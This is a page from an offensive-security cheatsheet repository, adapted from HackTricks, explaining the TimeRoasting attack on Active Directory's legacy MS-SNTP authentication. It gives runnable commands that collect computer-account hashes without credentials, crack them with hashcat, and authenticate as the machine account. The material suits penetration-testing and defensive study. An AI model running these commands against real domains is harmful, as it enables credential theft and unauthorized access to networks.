daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

timeroasting.md (4049B)


      1 ---
      2 title: "TimeRoasting"
      3 section: "Windows"
      4 sectionSlug: "windows-hardening"
      5 sourcePath: "src/windows-hardening/active-directory-methodology/TimeRoasting.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/windows-hardening/active-directory-methodology/TimeRoasting.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # TimeRoasting
     14 
     15 TimeRoasting abuses legacy MS-SNTP authentication. An unauthenticated client can send a 68-byte request containing a chosen computer-account RID. For the exploitable legacy path, the domain controller derives the response authenticator through Netlogon using the computer account's NT hash (the MD4-derived password secret), giving the attacker a challenge/MAC pair suitable for offline password guessing (Hashcat mode 31300).<sup>[[1]](#references)[[2]](#references)</sup>
     16 
     17 Sections 3.1.5.1 and 4 of MS-SNTP describe the request and response behavior:<sup>[[1]](#references)</sup>
     18 ![TimeRoasting: See section 3.1.5.1 "Authentication Request Behavior" and 4 "Protocol Examples" in the official MS-SNTP spec for details](https://raw.githubusercontent.com/HackTricks-wiki/hacktricks/188de82beb54e70956b2952367a0af91d26758b8/src/images/Pasted%20image%2020250709114508.png)
     19 When `ExtendedAuthenticatorSupported` is false, the request stores the RID in the low 31 bits of the authenticator's Key Identifier and a selector bit in the high bit. The server verifies the 68-byte length, extracts the RID, asks Netlogon to compute the candidate checksums, selects one using that high bit, zeroes the response Key Identifier, and returns the selected checksum.<sup>[[1]](#references)</sup>
     20 
     21 The crypto-checksum is MD5-based (see 3.2.5.1.1) and can be cracked offline, enabling the roasting attack.<sup>[[1]](#references)</sup>
     22 
     23 ## How to Attack
     24 
     25 [SecuraBV/Timeroast](https://github.com/SecuraBV/Timeroast) - Timeroasting scripts by Tom Tervoort<sup>[[3]](#references)</sup>
     26 
     27 ```bash
     28 sudo ./timeroast.py 10.0.0.42 | tee ntp-hashes.txt
     29 hashcat -m 31300 ntp-hashes.txt
     30 ```
     31 
     32 ---
     33 
     34 ## Practical attack (unauth) with NetExec + Hashcat
     35 
     36 - NetExec's `timeroast` module can enumerate computer RIDs, collect MS-SNTP MACs without authentication, and print `$sntp-ms$` hashes ready for cracking:<sup>[[4]](#references)</sup>
     37 
     38 ```bash
     39 # Target the DC (UDP/123). NetExec auto-crafts per-RID MS-SNTP requests
     40 netexec smb <dc_fqdn_or_ip> -M timeroast
     41 # Output example lines: $sntp-ms$*<rid>*md5*<salt>*<mac>
     42 ```
     43 
     44 - Crack offline with Hashcat mode 31300 (MS-SNTP MAC):<sup>[[5]](#references)</sup>
     45 
     46 ```bash
     47 hashcat -m 31300 timeroast.hashes /path/to/wordlist.txt --username
     48 # or let recent hashcat auto-detect; keep RIDs with --username for convenience
     49 ```
     50 
     51 - The recovered cleartext corresponds to a computer account password. Try it directly as the machine account using Kerberos (-k) when NTLM is disabled:
     52 
     53 ```bash
     54 # Example: cracked for RID 1125 -> likely IT-COMPUTER3$
     55 netexec smb <dc_fqdn> -u IT-COMPUTER3$ -p 'RecoveredPass' -k
     56 ```
     57 
     58 ### Operational notes
     59 - Ensure accurate time before using recovered credentials with Kerberos. Prefer a maintained NTP client such as `chronyd`/`systemd-timesyncd`; `ntpdate` is retained here as a common lab command: `sudo ntpdate <dc_fqdn>`.
     60 - If needed, generate krb5.conf for the AD realm: `netexec smb <dc_fqdn> --generate-krb5-file krb5.conf`
     61 - Map RIDs to principals later via LDAP/BloodHound once you have any authenticated foothold.
     62 
     63 ## References
     64 
     65 - [1] [MS-SNTP: Microsoft Simple Network Time Protocol](https://winprotocoldoc.z19.web.core.windows.net/MS-SNTP/%5bMS-SNTP%5d.pdf)
     66 - [2] [Secura – Timeroasting whitepaper](https://www.secura.com/uploads/whitepapers/Secura-WP-Timeroasting-v3.pdf)
     67 - [3] [SecuraBV/Timeroast](https://github.com/SecuraBV/Timeroast)
     68 - [4] [NetExec — `timeroast` module source](https://github.com/Pennyw0rth/NetExec/blob/main/nxc/modules/timeroast.py)
     69 - [5] [Hashcat mode 31300 – MS-SNTP](https://hashcat.net/wiki/doku.php?id=example_hashes)